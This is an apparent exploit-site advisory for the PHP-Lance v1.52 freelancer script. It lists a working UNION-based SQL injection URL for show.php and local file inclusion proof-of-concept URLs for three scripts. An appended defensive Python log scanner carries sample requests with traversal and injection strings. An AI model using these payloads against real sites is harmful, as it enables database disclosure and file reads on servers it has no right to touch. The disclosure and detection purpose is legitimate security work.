More Vulnerable Files in PHP-Lance v1.52

[+] Vendor : BitmixSoft (http://www.bitmixsoft.com)
[+] Script Name : PHP-Lance v1.52
[+] Price : US $349.95
[+] Description : PHP-Lance is a multilingual freelancer site with advanced customization options in the admin area. You can set all functions of the site: add as many languages as you want, change the site colors easily, set the transaction fee, manage sellers and buyers, etc.

[ SQL Injection ]

show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/*

Found by Cyb3r-1sT on November 27, 2008

[ Local File Inclusion ]

PoCs:

   - http://127.0.0.1/[path]/show.php?catid=5&sch=yellow&language=[LFI]
   - http://127.0.0.1/[path]/advanced_search.php?in=[LFI]

Found by jetli007 on August 18, 2009

And now one more vulnerable file, from Don Tukulesto:

- http://127.0.0.1/confirm.php?language=[LFI]
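
For defenders running this script, an added example (not part of the original advisory or the vendor's code) that scans web access logs for requests to the scripts listed above whose `catid`, `language` or `in` values are not a plain number or a short name. The log lines, the `/lance/` path and the allowed-value patterns are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: catid is a plain integer; language/in are short alphanumeric names.
INT_OK = re.compile(r"\d{1,10}")
NAME_OK = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Scripts and parameters named in the advisory, with the shape each should have.
WATCHED = {
    "show.php": {"catid": INT_OK, "language": NAME_OK},
    "advanced_search.php": {"in": NAME_OK},
    "confirm.php": {"language": NAME_OK},
}

def suspicious_params(url):
    """Return sorted (script, param) pairs whose value breaks the expected shape."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    rules = WATCHED.get(script, {})
    hits = set()
    # parse_qsl percent-decodes values, so encoded input is checked decoded.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        pattern = rules.get(key)
        if pattern and not pattern.fullmatch(value):
            hits.add((script, key))
    return sorted(hits)

def scan(log_lines):
    """Yield (client, url, hits) for combined-log-format lines with findings."""
    request = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
    for line in log_lines:
        m = request.match(line)
        if m:
            hits = suspicious_params(m.group(2))
            if hits:
                yield m.group(1), m.group(2), hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Dec/2009:10:00:01 +0000] "GET /lance/show.php?catid=5&sch=yellow&language=english HTTP/1.1" 200 5120',
    '198.51.100.9 - - [06/Dec/2009:10:00:05 +0000] "GET /lance/confirm.php?language=..%2F..%2Fsomefile%00 HTTP/1.1" 200 312',
    '198.51.100.9 - - [06/Dec/2009:10:00:09 +0000] "GET /lance/show.php?catid=-1%27+union+select+1 HTTP/1.1" 200 840',
    '198.51.100.9 - - [06/Dec/2009:10:00:12 +0000] "GET /lance/advanced_search.php?in=%2Fabs%2Fpath HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for client, url, hits in scan(SAMPLE_LOG):
        print(client, hits, url)
```

The same shape checks (integer-only `catid`, allowlisted names for `language` and `in`) are what the application itself should enforce before using these values.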

Dec 6th, 2009 | Posted in Exploitasi